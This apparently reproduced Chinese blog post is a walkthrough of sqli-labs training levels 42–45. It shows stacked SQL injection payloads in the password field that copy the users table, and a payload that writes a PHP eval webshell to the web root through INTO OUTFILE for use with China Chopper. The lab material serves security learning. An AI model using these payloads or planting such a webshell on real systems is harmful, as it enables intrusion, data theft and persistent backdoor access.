zoukankan      html  css  js  c++  java
  • Less42-Less45(post型)

    less42:  POST类型(注意:传参时候不能用--+    要用#即%23)使用''包裹

    我们可以看到password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造

     

    Admin  admin 登录

     

     

    a

    a';create table gxy42 like users;insert into gxy42 select *from users; #

    虽然显示这个,但是我们看sql数据库,说明我们注入成功

     

     

     

    Less43:  使用(‘’)包裹   其他与42关一致

    通过查看login.php源码我们知道跟第42关区别就是用户名跟密码用(‘’)包裹,其余与第42关一样

     

    a

    a');create table gxy43 like users;insert into gxy43 select *from users; #

     

    less-44:    使用’’包裹  其他与42关一致

    没有回显信息    id=’1‘

     password构造语句:a';create table gxy44 like users;insert into gxy44 select *from users; #

    less-45:   使用(‘’)包裹   其他与42关一致

    没有回显信息  id=(’1‘)

     password构造语句:a');create table gxy45 like users;insert into gxy45 select *from users; #

     或者使用堆叠注入写入一句话木马配合中国菜刀进行注入

    需要条件:

    1. 必须要有写权限
    2. 一句话木马
    3. Select xxx into outfile xxx
    4. 写入点

    一句话木马   <?php @eval($_POST[crow]);?> 

    写入路径  C:\phpStudy\WWW

    最终结果 a’)  select ‘<?php @eval($_POST[crow]);?>’ into outfile ‘C:\phpStudy\WWW\a.php’;#

     

     

  • 相关阅读:
    寻找我的黑客偶像
    20201215 《信息安全专业导论》第三周学习总结
    罗马数字
    base编码
    20201215 王馨瑶 第2周学习总结
    罗马数字转阿拉伯数字
    2020-2021-1 20201226 《信息安全专业导论》第三周学习总结
    IEEE754 浮点数
    Base64
    2020-2021-1 20201226 《信息安全专业导论》第2周学习总结
  • 原文地址:https://www.cnblogs.com/7-58/p/12273030.html
Copyright © 2011-2022 走看看